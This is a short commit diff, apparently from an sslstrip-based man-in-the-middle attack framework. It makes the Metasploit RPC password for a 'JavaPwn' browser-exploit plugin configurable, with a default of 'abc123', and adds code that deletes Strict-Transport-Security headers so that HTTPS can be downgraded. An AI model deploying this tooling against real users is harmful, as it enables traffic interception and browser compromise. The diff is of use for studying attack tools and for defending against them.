made rpc pass configurable

plugins/JavaPwn.py

@@ -23,6 +23,7 @@ class JavaPwn(BrowserProfiler, Plugin):
         self.msfip = options.msfip
         self.msfport = options.msfport
         self.rpcip = options.rpcip
+        self.rpcpass = options.rpcpass
 
         if not self.msfip:
             sys.exit('[-] JavaPwn plugin requires --msfip')
@@ -38,11 +39,11 @@ class JavaPwn(BrowserProfiler, Plugin):
 
         try:
             msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
-            msf.login('msf', 'abc123')
+            msf.login('msf', self.rpcpass)
             version = msf.call('core.version')['version']
             print "[*] Succesfully connected to Metasploit v%s" % version
         except:
-            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'")
+            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
 
         #Initialize the BrowserProfiler plugin
         BrowserProfiler.initialize(self, options)
@@ -167,11 +168,12 @@ class JavaPwn(BrowserProfiler, Plugin):
         options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
         options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
         options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
+        options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
 
     def finish(self):
         '''This will be called when shutting down'''
         msf = msfrpc.Msfrpc({"host": self.rpcip})
-        msf.login('msf', 'abc123')
+        msf.login('msf', self.rpcpass)
         jobs = msf.call('job.list')
         if len(jobs) > 0:
             print '[*] Stopping all running metasploit jobs'

plugins/Linkrewriter.py

@@ -1,4 +1,4 @@
-#There probably is a better way of doing this
+#probably a better way of doing this
 
 import logging, re, sys, os
 from plugins.plugin import Plugin

sslstrip/ClientRequest.py

@@ -56,6 +56,9 @@ class ClientRequest(Request):
         if 'accept-encoding' in headers:
              headers['accept-encoding'] == 'identity'
 
+        if 'Strict-Transport-Security' in headers: #kill new hsts requests
+            del headers['Strict-Transport-Security']
+        
         if 'if-modified-since' in headers:
             del headers['if-modified-since']